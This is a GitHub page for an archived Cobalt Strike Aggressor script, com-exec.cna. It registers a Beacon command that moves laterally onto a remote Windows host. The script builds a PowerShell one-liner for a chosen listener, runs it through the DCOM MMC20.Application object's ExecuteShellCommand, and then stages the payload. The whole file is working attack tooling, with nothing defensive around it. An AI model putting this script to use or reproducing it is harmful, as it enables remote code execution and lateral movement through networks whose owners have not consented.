This repository has been archived by the owner on Dec 14, 2023. It is now read-only.
-
-
Notifications
You must be signed in to change notification settings - Fork 85
/
com-exec.cna
57 lines (47 loc) · 1.69 KB
/
com-exec.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
if ($3 is $null) {
# let the user choose a listener
openPayloadHelper(lambda({
com_exec_go($bid, $target, $1);
}, $bid => $1, $target => $2));
}
else {
# we have the needed arguments, pass them
com_exec_go($1, $2, $3);
}
}
# this is the implementation of the attack
sub com_exec_go {
local('$command $script $oneliner');
# check if our listener exists
if (listener_info($3) is $null) {
berror($1, "Listener $3 does not exist");
return;
}
# state what we're doing.
btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3, $2) . ") via DCOM");
# generate a PowerShell one-liner to run our alias
$command = powershell($3, true, "x86");
# remove "powershell.exe " from our command
$command = strrep($command, "powershell.exe ", "");
# build script that uses DCOM to invoke ExecuteShellCommand on MMC20.Application object
$script = '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "';
$script .= $2;
$script .= '")).Document.ActiveView.ExecuteShellCommand("';
$script .= 'c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe';
$script .= '", $null, "';
$script .= $command;
$script .= '", "7")';
# run the script we built up
bpowershell!($1, $script);
btask($1,$script);
# complete staging process (for bind_pipe listeners)
bstage($1, $2, $3);
}